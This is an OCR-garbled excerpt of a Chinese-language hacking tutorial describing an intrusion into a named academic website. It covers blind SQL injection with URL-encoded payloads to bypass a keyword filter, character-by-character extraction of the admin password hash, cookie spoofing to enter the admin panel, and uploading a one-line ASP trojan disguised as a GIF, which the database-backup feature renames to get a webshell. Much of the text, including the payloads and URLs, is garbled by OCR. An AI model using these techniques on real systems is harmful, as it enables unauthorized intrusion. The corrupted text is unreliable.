如发现有乱码， 请直接从这里浏览原文
正文摘录:

~drain—new~一view.~sp?newsid=25and(selectmid(pas~.1.1)from~drainwhereuser=’~drain。)=’1。。这条语句的意思就是取出admin表里用户名等于admin的密码的第一位，并拿它和1比较.如果等于l就返回正常页面，否则出错。我们把语句放到浏览器里浏览，返回的页面却是“你的网址不合法”(图5)。图5这是因为过滤了Select等关键字，所以我们并不能使用NBSI等注入工具直接进行猜解，只要把·rld(··I·ctmid(P-··.1。1)frOm-dminwhereuser~’admin’)=’1’转换成URL编码，便可以绕过过滤继续注入查询了(图6)。图6最终构造的语句就变成了：httP：／／WWW.npic.ec.cn／chin··e／·dm.n—news—view.~sp?newsid=25％20％81％6E％84％20％28％73％65％6C％65％B3％74％20％BD％e9％e4％2B％70％61％73％73％2C％31％2C％31％28％20％ee％72％6F％6D％20％61％64％6D％∞％6E％20％T7％68％65％72％髓％2a％75％73％髓％72％3D％27％e1％64％8D％89％8E％27％29％3D％27％31％27。我们提交到IE里.可以看到返回的是正常页面.说明admin的密码散列的第一位确实是l(图7)。接下来就是体力劳动了，耐心的一位位的进行猜解!把语句里的mid(P¨·.1。1)改为mid(p-··.2，1)就表示猜测第二位，依此类推。最终得到admin的密码是lb9dcdddc959e0404f35046f21af5ld5.然后到http：／／www.cmd5.corn／default.aspx上查询了一下，可是遗憾的是并没有查出密码。不过幸运的是这套程序还存在c00kies欺骗漏洞!我们不需要知道密码散列解密后的明文就可以进入后台。我们使用一个可以修改cookies的浏览器工具把cookies改为：ASPSESSIONIDQCDSRQAD=JCBMNMO日FGPKMHMPPKHAPDCD，~dmindj=ll~dminuser=edminIadminpass=lbgdcdddc959e0404f3~046f21e151d5，然后在访问http：／／www.npic.ae.cn／chinese／admin—index.asp，就会发现我们已经顺利进人了后台(图8)。图8点击“新闻增加”，然后“插入图片”，选择一个gif后缀的ASP木马上传。我上传的是海阳一句话木马，然后点击确定把木马上传上去(图9)。接着在红色小叉上点右键查看图片属性，就可以看到图片的地址了(图10)。图9最后就是备份了，在。当前数据库”传图片的地址.然后在。备份数据库名称”(图11)。填上刚才上填写X.asP再单击“备份数据”.提示备份成功了。我们使用海阳的客户端连接便可以得到一个WebShell了(图12)。